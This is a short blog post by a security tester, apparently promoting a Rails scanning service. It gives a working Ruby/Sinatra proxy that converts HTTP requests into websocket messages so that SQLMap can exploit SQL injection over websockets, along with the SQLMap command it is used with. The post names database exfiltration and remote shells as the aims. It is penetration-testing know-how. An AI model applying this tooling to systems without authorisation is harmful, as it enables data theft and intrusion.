I was testing for SQL Injection on a target the other day, and after a little fuzzing indicated that there might be a vulnerability, I wanted to use SQLMap to make data exfiltration easier. But this vulnerability was part of a websocket request, and unfortunately, SQLMap doesn’t support websockets. One solution to this problem is to introduce a little proxy between the websocket endpoint and SQLMap and convert HTTP requests into websocket ones.
This is actually pretty simple to achieve with a few lines of Ruby. I decided to use a little Sinatra app with the faye-websocket gem as a websocket client. First, I installed the necessary gems:
gem install sinatra faye-websocket rackup puma
Then I added the following code to a file called app.rb:
require 'json'
require 'eventmachine'
require 'faye/websocket'
require 'sinatra'

# faye-websocket's client needs a running EventMachine reactor (Puma does not start one)
Thread.new { EM.run } unless EM.reactor_running?

get '/' do
  username = params['username'].to_s
  reply = Queue.new
  EM.schedule do # socket work must run on the reactor thread
    ws = Faye::WebSocket::Client.new('ws://TARGET/cable')
    ws.on :open do |_event|
      # convert the GET parameter into the JSON message the endpoint expects
      ws.send({ 'username' => username }.to_json)
    end
    ws.on :message do |event|
      reply << event.data
      ws.close
    end
    ws.on :close do |_event|
      reply << '' if reply.empty? # unblock the handler if the socket closes without a reply
    end
  end
  reply.pop # block until the first message arrives and return it as the HTTP body
end
What’s happening here is that we add a “/” route handler to Sinatra, and in the handler, we open a websocket connection to the target. Then, we add an “open” handler that converts the GET parameter into the JSON the websocket endpoint expects, and when we receive a message back, we return its data as the HTTP response body and close the websocket connection.
We can run this little app with ruby app.rb and point SQLMap to the URL of the app:
python3 sqlmap.py -u http://127.0.0.1:4567/\?username\=test --threads=10 --batch
to exfiltrate the database or even get a remote shell if we are lucky.
A few lines of Ruby saved the day again.
I run an indie startup providing vulnerability scanning for your Ruby on Rails app.
It is free to use at the moment, and I am grateful for any feedback about it. If you would like to give it a spin, you can do it here: Vulnerability Scanning for your Ruby on Rails app!